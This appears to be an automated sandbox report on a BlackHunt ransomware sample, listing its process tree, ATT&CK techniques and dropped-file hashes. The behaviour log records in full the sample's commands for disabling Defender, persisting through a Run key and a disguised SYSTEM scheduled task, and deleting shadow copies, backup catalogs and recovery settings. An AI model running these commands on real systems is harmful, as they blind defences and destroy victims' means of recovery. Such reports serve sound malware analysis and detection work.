C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F2⤵PID:1624
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F3⤵
- Creates scheduled task(s)
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1820
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:824
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:784
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:400
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2128
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
- Modifies registry class
PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2380
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:332
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:904
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:600
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2180
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2964
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2104
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1096
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5684be959fa09bf2bdc6f0cbb1394cdbc
SHA19070000c6a794fcbe16961ed01f1b4753c9a9073
SHA256dd9a74035a4184b3b93c17abec455be7bf01727f0c8c034dd4ea75b1df88402a
SHA512b789dd25cbd7a8b8f87e070c38bbe3d2b16a9891a3dc421e81ee50a9fbf619307515930ad755a42cc090b90398bcc32e52f2bf0f82426845a604846dbeef2a81
-
Filesize
684B
MD583e16b7bc7fa812af57904c462c640bb
SHA11f3915789610dbf6364b71ef5317f1bc77cb21be
SHA256da10973279672de583282d9d13efde36d8ab948ea2acb3854870aaa6177fd50f
SHA5128d4f86b4121dd0a9b945c2c0366b2a0d417419e3f4d3e81fde8f1eb8544f3a10fd2882401ed6bef48e3735d474be3ed09698fc2866fb1f28f903f6fa176c4742
-
Filesize
1KB
MD511cb3e2653641d806d62ad1c05fbda82
SHA1761cf4a1ee18e1f7f920f8f9ec1ccccd27a7f3b4
SHA2563c3623e85bc5daac9dff486f8199b5418a4a6d34704c5f248dd2b6708b1bd562
SHA512d437396ba8fe32b9f7fdd266926c951f9392fafa97c960c03576ee4bcaaaa745d316391a7bd125fcc799d6bd9fa610ba2f9d0ce4d6a165ee1e8dd520d10ea0f6